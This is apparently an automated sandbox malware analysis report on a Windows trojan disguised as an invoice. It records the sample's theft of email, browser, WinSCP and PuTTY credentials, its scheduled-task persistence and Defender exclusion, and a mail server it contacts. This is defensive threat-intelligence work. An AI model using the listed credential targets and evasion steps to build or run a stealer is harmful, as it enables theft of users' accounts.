                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeQueries volume information: C:\Users\user\AppData\Roaming\txQleCu.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeCode function: 6_2_02E3F650 GetUserNameW,

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 0.2.INVOICE_NO._29998172.exe.40a93e0.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.INVOICE_NO._29998172.exe.40d2600.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.629144860.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.629486178.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: INVOICE_NO._29998172.exe PID: 6032, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: txQleCu.exe PID: 6656, type: MEMORYSTR
                Source: Yara matchFile source: 5.2.txQleCu.exe.4561c18.7.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.txQleCu.exe.4561c18.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.INVOICE_NO._29998172.exe.40d2600.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.txQleCu.exe.45389f8.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.txQleCu.exe.45389f8.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.INVOICE_NO._29998172.exe.40a93e0.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.txQleCu.exe.450b5d8.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.INVOICE_NO._29998172.exe.40a93e0.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.INVOICE_NO._29998172.exe.40d2600.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.399658088.000000000407C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.440863847.000000000450B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.399658088.0000000004975000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: Yara matchFile source: 00000006.00000002.629144860.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.629486178.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: INVOICE_NO._29998172.exe PID: 6032, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: txQleCu.exe PID: 6656, type: MEMORYSTR
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 0.2.INVOICE_NO._29998172.exe.40a93e0.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.INVOICE_NO._29998172.exe.40d2600.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.629144860.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.629486178.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: INVOICE_NO._29998172.exe PID: 6032, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: txQleCu.exe PID: 6656, type: MEMORYSTR
                Source: Yara matchFile source: 5.2.txQleCu.exe.4561c18.7.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.txQleCu.exe.4561c18.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.INVOICE_NO._29998172.exe.40d2600.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.txQleCu.exe.45389f8.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.txQleCu.exe.45389f8.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.INVOICE_NO._29998172.exe.40a93e0.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.txQleCu.exe.450b5d8.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.INVOICE_NO._29998172.exe.40a93e0.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.INVOICE_NO._29998172.exe.40d2600.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.399658088.000000000407C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.440863847.000000000450B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.399658088.0000000004975000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid Accounts121
                Windows Management Instrumentation
                1
                Scheduled Task/Job
                11
                Process Injection
                11
                Disable or Modify Tools
                1
                OS Credential Dumping
                1
                Account Discovery
                Remote Services1
                Archive Collected Data
                Exfiltration Over Other Network Medium1
                Encrypted Channel
                Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default Accounts1
                Scheduled Task/Job
                Boot or Logon Initialization Scripts1
                Scheduled Task/Job
                3
                Obfuscated Files or Information
                1
                Input Capture
                1
                File and Directory Discovery
                Remote Desktop Protocol1
                Data from Local System
                Exfiltration Over Bluetooth1
                Non-Standard Port
                Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)12
                Software Packing
                1
                Credentials in Registry
                24
                System Information Discovery
                SMB/Windows Admin Shares1
                Email Collection
                Automated Exfiltration1
                Non-Application Layer Protocol
                Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
                Masquerading
                NTDS211
                Security Software Discovery
                Distributed Component Object Model1
                Input Capture
                Scheduled Transfer11
                Application Layer Protocol
                SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script131
                Virtualization/Sandbox Evasion
                LSA Secrets1
                Process Discovery
                SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.common11
                Process Injection
                Cached Domain Credentials131
                Virtualization/Sandbox Evasion
                VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync1
                Application Window Discovery
                Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
                System Owner/User Discovery
                Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow1
                Remote System Discovery
                Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 signatures2 2 Behavior Graph ID: 876157 Sample: INVOICE_NO._29998172.exe Startdate: 26/05/2023 Architecture: WINDOWS Score: 100 47 Snort IDS alert for network traffic 2->47 49 Found malware configuration 2->49 51 Malicious sample detected (through community Yara rule) 2->51 53 8 other signatures 2->53 7 INVOICE_NO._29998172.exe 7 2->7         started        11 txQleCu.exe 5 2->11         started        process3 file4 31 C:\Users\user\AppData\Roaming\txQleCu.exe, PE32 7->31 dropped 33 C:\Users\user\...\txQleCu.exe:Zone.Identifier, ASCII 7->33 dropped 35 C:\Users\user\AppData\Local\...\tmpEB82.tmp, XML 7->35 dropped 37 C:\Users\...\INVOICE_NO._29998172.exe.log, ASCII 7->37 dropped 55 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 7->55 57 Uses schtasks.exe or at.exe to add and modify task schedules 7->57 59 Adds a directory exclusion to Windows Defender 7->59 13 INVOICE_NO._29998172.exe 2 7->13         started        17 powershell.exe 21 7->17         started        19 schtasks.exe 1 7->19         started        61 Multi AV Scanner detection for dropped file 11->61 63 Machine Learning detection for dropped file 11->63 21 txQleCu.exe 2 11->21         started        23 schtasks.exe 1 11->23         started        signatures5 process6 dnsIp7 39 gimpex-imerys.com 5.100.152.24, 49697, 49698, 587 PUBLIC-DOMAIN-REGISTRYUS United Kingdom 13->39 41 mail.gimpex-imerys.com 13->41 43 192.168.2.1 unknown unknown 13->43 25 conhost.exe 17->25         started        27 conhost.exe 19->27         started        45 mail.gimpex-imerys.com 21->45 65 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 21->65 67 Tries to steal Mail credentials (via file / registry access) 21->67 69 Tries to harvest and steal browser information (history, passwords, etc) 21->69 29 conhost.exe 23->29         started        signatures8 process9

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                INVOICE_NO._29998172.exe25%ReversingLabsWin32.Trojan.Pwsx
                INVOICE_NO._29998172.exe34%VirustotalBrowse
                INVOICE_NO._29998172.exe100%Joe Sandbox ML
                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\txQleCu.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Roaming\txQleCu.exe25%ReversingLabsWin32.Trojan.Pwsx
                No Antivirus matches
                SourceDetectionScannerLabelLink
                gimpex-imerys.com0%VirustotalBrowse
                mail.gimpex-imerys.com0%VirustotalBrowse
                SourceDetectionScannerLabelLink
                http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                http://www.tiro.com0%URL Reputationsafe
                http://www.goodfont.co.kr0%URL Reputationsafe
                http://www.carterandcone.com0%URL Reputationsafe
                http://www.carterandcone.comj0%URL Reputationsafe
                http://www.fontbureau.comiona0%URL Reputationsafe
                http://www.fontbureau.comiona0%URL Reputationsafe
                http://www.carterandcone.coml0%URL Reputationsafe
                http://www.sajatypeworks.com0%URL Reputationsafe
                http://www.sajatypeworks.com0%URL Reputationsafe
                http://www.typography.netD0%URL Reputationsafe
                http://www.typography.netD0%URL Reputationsafe
                http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                http://fontfabrik.com0%URL Reputationsafe
                http://fontfabrik.com0%URL Reputationsafe
                http://www.founder.com.cn/cn0%URL Reputationsafe
                http://www.founder.com.cn/cn0%URL Reputationsafe
                http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                http://www.carterandcone.comitk0%URL Reputationsafe
                http://www.sandoll.co.kr0%URL Reputationsafe
                http://www.urwpp.deDPlease0%URL Reputationsafe
                http://www.zhongyicts.com.cn0%URL Reputationsafe
                http://www.founder.com.cn/cnhtn0%Avira URL Cloudsafe
                http://www.sakkal.com0%URL Reputationsafe
                http://gimpex-imerys.com0%Avira URL Cloudsafe
                http://mail.gimpex-imerys.com0%Avira URL Cloudsafe
                http://www.sajatypeworks.compew0%Avira URL Cloudsafe
                http://www.agfamonotype.50%Avira URL Cloudsafe
                http://www.fontbureau.comttco0%Avira URL Cloudsafe
                http://www.founder.com.cn/cn/t-F0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                gimpex-imerys.com
                5.100.152.24
                truetrueunknown
                mail.gimpex-imerys.com
                unknown
                unknowntrueunknown
                NameSourceMaliciousAntivirus DetectionReputation
                http://www.apache.org/licenses/LICENSE-2.0INVOICE_NO._29998172.exe, 00000000.00000002.403738185.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  http://www.fontbureau.comINVOICE_NO._29998172.exe, 00000000.00000002.403738185.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    http://www.fontbureau.com/designersGINVOICE_NO._29998172.exe, 00000000.00000002.403738185.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      http://www.fontbureau.com/designers/?INVOICE_NO._29998172.exe, 00000000.00000002.403738185.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        http://www.founder.com.cn/cn/bTheINVOICE_NO._29998172.exe, 00000000.00000002.403738185.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://www.founder.com.cn/cnhtnINVOICE_NO._29998172.exe, 00000000.00000003.363028287.0000000005DD0000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.fontbureau.com/designers?INVOICE_NO._29998172.exe, 00000000.00000002.403738185.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://gimpex-imerys.comINVOICE_NO._29998172.exe, 00000006.00000002.629144860.0000000002EF0000.00000004.00000800.00020000.00000000.sdmp, txQleCu.exe, 0000000C.00000002.629486178.0000000002C40000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://mail.gimpex-imerys.comINVOICE_NO._29998172.exe, 00000006.00000002.629144860.0000000002EF0000.00000004.00000800.00020000.00000000.sdmp, txQleCu.exe, 0000000C.00000002.629486178.0000000002C40000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.sajatypeworks.compewINVOICE_NO._29998172.exe, 00000000.00000003.360891857.0000000005DDB000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.tiro.comINVOICE_NO._29998172.exe, 00000000.00000002.403738185.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://www.fontbureau.com/designersINVOICE_NO._29998172.exe, 00000000.00000003.366549798.0000000005DD5000.00000004.00000020.00020000.00000000.sdmp, INVOICE_NO._29998172.exe, 00000000.00000003.365774175.0000000005DD5000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            http://www.goodfont.co.krINVOICE_NO._29998172.exe, 00000000.00000002.403738185.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.carterandcone.comINVOICE_NO._29998172.exe, 00000000.00000003.363538297.0000000005DCC000.00000004.00000020.00020000.00000000.sdmp, INVOICE_NO._29998172.exe, 00000000.00000003.364528393.0000000005DCB000.00000004.00000020.00020000.00000000.sdmp, INVOICE_NO._29998172.exe, 00000000.00000003.364115711.0000000005DCB000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.carterandcone.comjINVOICE_NO._29998172.exe, 00000000.00000003.363657222.0000000005DD5000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.fontbureau.comionaINVOICE_NO._29998172.exe, 00000000.00000003.386928424.0000000005DC0000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://www.carterandcone.comlINVOICE_NO._29998172.exe, 00000000.00000002.403738185.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.sajatypeworks.comINVOICE_NO._29998172.exe, 00000000.00000003.360854011.0000000005DDB000.00000004.00000020.00020000.00000000.sdmp, INVOICE_NO._29998172.exe, 00000000.00000003.360864782.0000000005DDB000.00000004.00000020.00020000.00000000.sdmp, INVOICE_NO._29998172.exe, 00000000.00000002.403738185.0000000006ED2000.00000004.00000800.00020000.00000000.sdmp, INVOICE_NO._29998172.exe, 00000000.00000003.360830990.0000000005DDB000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://www.typography.netDINVOICE_NO._29998172.exe, 00000000.00000002.403738185.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://www.fontbureau.com/designers/cabarga.htmlNINVOICE_NO._29998172.exe, 00000000.00000002.403738185.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://www.founder.com.cn/cn/cTheINVOICE_NO._29998172.exe, 00000000.00000002.403738185.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.galapagosdesign.com/staff/dennis.htmINVOICE_NO._29998172.exe, 00000000.00000003.367109894.0000000005DD5000.00000004.00000020.00020000.00000000.sdmp, INVOICE_NO._29998172.exe, 00000000.00000002.403738185.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://fontfabrik.comINVOICE_NO._29998172.exe, 00000000.00000002.403738185.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://www.founder.com.cn/cnINVOICE_NO._29998172.exe, 00000000.00000002.403738185.0000000006ED2000.00000004.00000800.00020000.00000000.sdmp, INVOICE_NO._29998172.exe, 00000000.00000003.363028287.0000000005DD0000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://www.fontbureau.com/designers/frere-jones.htmlINVOICE_NO._29998172.exe, 00000000.00000002.403738185.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://www.jiyu-kobo.co.jp/INVOICE_NO._29998172.exe, 00000000.00000002.403738185.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://www.galapagosdesign.com/DPleaseINVOICE_NO._29998172.exe, 00000000.00000002.403738185.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://www.fontbureau.com/designers8INVOICE_NO._29998172.exe, 00000000.00000002.403738185.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://www.carterandcone.comitkINVOICE_NO._29998172.exe, 00000000.00000003.363520351.0000000005DF4000.00000004.00000020.00020000.00000000.sdmp, INVOICE_NO._29998172.exe, 00000000.00000003.363556816.0000000005DF4000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.agfamonotype.5INVOICE_NO._29998172.exe, 00000000.00000003.364564498.0000000005DCB000.00000004.00000020.00020000.00000000.sdmp, INVOICE_NO._29998172.exe, 00000000.00000003.364485994.0000000005DCB000.00000004.00000020.00020000.00000000.sdmp, INVOICE_NO._29998172.exe, 00000000.00000003.364509296.0000000005DCD000.00000004.00000020.00020000.00000000.sdmp, INVOICE_NO._29998172.exe, 00000000.00000003.364376733.0000000005DCA000.00000004.00000020.00020000.00000000.sdmp, INVOICE_NO._29998172.exe, 00000000.00000003.364528393.0000000005DCB000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  low
                                  http://www.fonts.comINVOICE_NO._29998172.exe, 00000000.00000002.398030415.0000000001607000.00000004.00000020.00020000.00000000.sdmp, INVOICE_NO._29998172.exe, 00000000.00000002.403738185.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://www.sandoll.co.krINVOICE_NO._29998172.exe, 00000000.00000002.403738185.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.urwpp.deDPleaseINVOICE_NO._29998172.exe, 00000000.00000002.403738185.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.fontbureau.com/designers:INVOICE_NO._29998172.exe, 00000000.00000003.365753646.0000000005DD6000.00000004.00000020.00020000.00000000.sdmp, INVOICE_NO._29998172.exe, 00000000.00000003.365728088.0000000005DD5000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      http://www.zhongyicts.com.cnINVOICE_NO._29998172.exe, 00000000.00000002.403738185.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.fontbureau.com/designers/frere-jones.htmlCINVOICE_NO._29998172.exe, 00000000.00000003.365970540.0000000005DCC000.00000004.00000020.00020000.00000000.sdmp, INVOICE_NO._29998172.exe, 00000000.00000003.366153312.0000000005DCD000.00000004.00000020.00020000.00000000.sdmp, INVOICE_NO._29998172.exe, 00000000.00000003.366056911.0000000005DCD000.00000004.00000020.00020000.00000000.sdmp, INVOICE_NO._29998172.exe, 00000000.00000003.365997383.0000000005DCC000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameINVOICE_NO._29998172.exe, 00000000.00000002.398102973.0000000002EB1000.00000004.00000800.00020000.00000000.sdmp, txQleCu.exe, 00000005.00000002.437574152.0000000003341000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://www.fontbureau.comttcoINVOICE_NO._29998172.exe, 00000000.00000003.386928424.0000000005DC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.sakkal.comINVOICE_NO._29998172.exe, 00000000.00000002.403738185.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.founder.com.cn/cn/t-FINVOICE_NO._29998172.exe, 00000000.00000003.363243179.0000000005DCD000.00000004.00000020.00020000.00000000.sdmp, INVOICE_NO._29998172.exe, 00000000.00000003.363307593.0000000005DD2000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs
                                          IPDomainCountryFlagASNASN NameMalicious
                                          5.100.152.24
                                          gimpex-imerys.comUnited Kingdom
                                          394695PUBLIC-DOMAIN-REGISTRYUStrue
                                          IP
                                          192.168.2.1
                                          Joe Sandbox Version:37.1.0 Beryl
                                          Analysis ID:876157
                                          Start date and time:2023-05-26 11:29:02 +02:00
                                          Joe Sandbox Product:CloudBasic
                                          Overall analysis duration:0h 9m 21s
                                          Hypervisor based Inspection enabled:false
                                          Report type:light
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                          Number of analysed new started processes analysed:15
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • HDC enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Sample file name:INVOICE_NO._29998172.exe
                                          Detection:MAL
                                          Classification:mal100.troj.spyw.evad.winEXE@15/9@4/2
                                          EGA Information:
                                          • Successful, ratio: 100%
                                          HDC Information:Failed
                                          HCA Information:
                                          • Successful, ratio: 99%
                                          • Number of executed functions: 0
                                          • Number of non-executed functions: 0
                                          Cookbook Comments:
                                          • Found application associated with file extension: .exe
                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe, WmiPrvSE.exe
                                          • Not all processes where analyzed, report is missing behavior information
                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                          TimeTypeDescription
                                          11:30:02API Interceptor11x Sleep call for process: INVOICE_NO._29998172.exe modified
                                          11:30:08Task SchedulerRun new task: txQleCu path: C:\Users\user\AppData\Roaming\txQleCu.exe
                                          11:30:08API Interceptor26x Sleep call for process: powershell.exe modified
                                          11:30:21API Interceptor9x Sleep call for process: txQleCu.exe modified
                                          No context
                                          No context
                                          No context
                                          No context
                                          No context
                                          Process:C:\Users\user\Desktop\INVOICE_NO._29998172.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:modified
                                          Size (bytes):1302
